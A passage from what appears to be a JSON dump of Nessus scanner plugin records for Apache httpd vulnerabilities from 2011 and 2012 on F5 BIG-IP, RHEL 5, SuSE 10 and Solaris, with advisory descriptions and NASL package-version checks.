cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:47:42", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.", "cvss3": {"score": null, "vector": null}, "published": "2014-12-05T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache HTTP server vulnerabilities (SOL15889)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL15889.NASL", "href": "https://www.tenable.com/plugins/nessus/79733", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL15889.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79733);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50802, 51705);\n\n script_name(english:\"F5 Networks BIG-IP : Apache HTTP server vulnerabilities (SOL15889)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15889\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL15889.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL15889\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"11.2.0-11.6.0\",\"10.2.4HF12\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.2.0-11.4.1\",\"10.2.4HF12\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\",\"10.2.4HF12\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.1.0\",\"10.0.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.0-11.3.0\",\"10.2.4HF12\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:37:48", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-22T00:00:00", "type": "nessus", "title": "RHEL 5 : httpd (RHSA-2012:0323)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2012-0323.NASL", "href": "https://www.tenable.com/plugins/nessus/58085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0323. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58085);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"RHEL 5 : httpd (RHSA-2012:0323)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1392.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0323\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-63.el5_8.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:24", "description": "This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives. (CVE-2011-3639 / CVE-2011-3368 / CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a heap-based buffer overflow could potentially allow local attackers to gain privileges. (CVE-2011-3607)", "cvss3": {"score": null, "vector": null}, "published": "2011-12-14T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Apache2 (ZYPP Patch Number 7882)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1473", "CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-7882.NASL", "href": "https://www.tenable.com/plugins/nessus/57298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57298);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-1473\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\");\n\n script_name(english:\"SuSE 10 Security Update : Apache2 (ZYPP Patch Number 7882)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\n - This update also includes several fixes for a mod_proxy\n reverse exposure via RewriteRule or ProxyPassMatch\n directives. (CVE-2011-3639 / CVE-2011-3368 /\n CVE-2011-4317)\n\n - Fixed the SSL renegotiation DoS by disabling\n renegotiation by default. (CVE-2011-1473)\n\n - Integer overflow in ap_pregsub function resulting in a\n heap-based buffer overflow could potentially allow local\n attackers to gain privileges. (CVE-2011-3607)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1473.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3607.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7882.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-devel-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-doc-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-example-pages-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-prefork-2.2.3-16.42.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"apache2-worker-2.2.3-16.42.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-27T14:50:52", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. (CVE-2011-3607)\n\n - The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n (CVE-2011-4317)\n\n - scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function. (CVE-2012-0031)\n\n - protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. (CVE-2012-0053)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : apache (cve_2011_3607_buffer_overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:apache"], "id": "SOLARIS11_APACHE_20120420.NASL", "href": "https://www.tenable.com/plugins/nessus/80582", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80582);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : apache (cve_2011_3607_buffer_overflow)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer overflow in the ap_pregsub function in\n server/util.c in the Apache HTTP Server 2.0.x through\n 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif\n module is enabled, allows local users to gain privileges\n via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header,\n leading to a heap-based buffer overflow. (CVE-2011-3607)\n\n - The mod_proxy module in the Apache HTTP Server 2.0.x\n through 2.0.64, and 2.2.x through 2.2.21, when the\n Revision 1179239 patch is in place, does not properly\n interact with use of (1) RewriteRule and (2)\n ProxyPassMatch pattern matches for configuration of a\n reverse proxy, which allows remote attackers to send\n requests to intranet servers via a malformed URI\n containing an @ (at sign) character and a : (colon)\n character in invalid positions. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2011-3368.\n 